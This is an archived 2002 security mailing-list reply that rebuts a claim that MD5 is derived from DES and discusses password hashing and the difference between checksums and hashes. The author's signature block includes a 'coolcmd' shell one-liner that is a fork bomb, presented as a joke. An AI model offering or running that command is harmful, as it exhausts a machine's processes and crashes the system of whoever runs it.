-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 On Friday 16 August 2002 17:47, Bob the Builder wrote: > The md5 hashing algorithm is based on the DES encryption algorithm. I'm sorry, could you prove this claim or is this just somethine you've 'heard somewhere'? I see no similarity. rfc1186 for MD4, BTW, which MD5 was based on. A (very) quick search of rfc1186 reveils no mention of DES. Other information for the topic: UNIX traditionally uses DES to hash passwords, but some flavours let you use MD5 instead. OpenBSD uses blowfish by default. I will not argue the security of blowfish as a hashing algorithm based on it being in OpenBSD since I don't buy the "OpenBSD is safer" thing[1]. BUT.... in "Applied Cryptography" (page 336 in my copy[2]) you'll see Bruce Schneier[3] saying that it's not suitable for one-way hash functions. He doesn't say clearly why. > The point of using md5 is about obtaining a checksum for a given piece of > data where it is difficult (computationally infeasable) to produce a second > piece of data that results in the same checksum. Hmm, I don't know for sure, but isn't 'checksum' the wrong word to use? Checksums are used to detect errors in transmission, not malicious alterations. Examples of such are the normal checksums in IP packets which IIRC are based on polynomial division or something.[4] And malicious alteration of data without altering the checksum is supposedly trivial. I think hash value, or hash output, is more correct. But I could be completely wrong on this one. [1] It's a big and OT issue. [2] MD5 is on _4_36, spooky. [3] Who is the guy that designed blowfish [4] I have known the theory behind CRC :). > example the md5sum on unix usually uses a DES key that is just a string of > zeroes. I really think you're confusing /etc/passwd with it's different choices of hashing functions. - --------- typedef struct me_s { char name[] = { "Thomas Habets" }; char email[] = { "thomasat_private" }; char kernel[] = { "Linux 2.4" }; char *pgpKey[] = { "http://darkface.pp.se/~thompa/pubkey.txt" }; char pgp[] = { "A8A3 D1DD 4AE0 8467 7FDE 0945 286A E90A AD48 E854" }; char coolcmd[] = { "echo '. ./_&. ./_'>_;. ./_" }; } me_t; -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.0.6 (GNU/Linux) Comment: For info see http://www.gnupg.org iD8DBQE9YBuNKGrpCq1I6FQRAjR2AKCJ0/KgT52cPQHLyqOawfqVJnfIqwCgz/kt JCX7Ap+1ZcfSs9poXZKQwVg= =BIsy -----END PGP SIGNATURE----- ----------------------------------------------------------------- This list is provided by the SecurityFocus ARIS analyzer service. For more information on this free incident handling, management and tracking system please see: http://aris.securityfocus.com
This archive was generated by hypermail 2b30 : Mon Aug 19 2002 - 03:16:36 PDT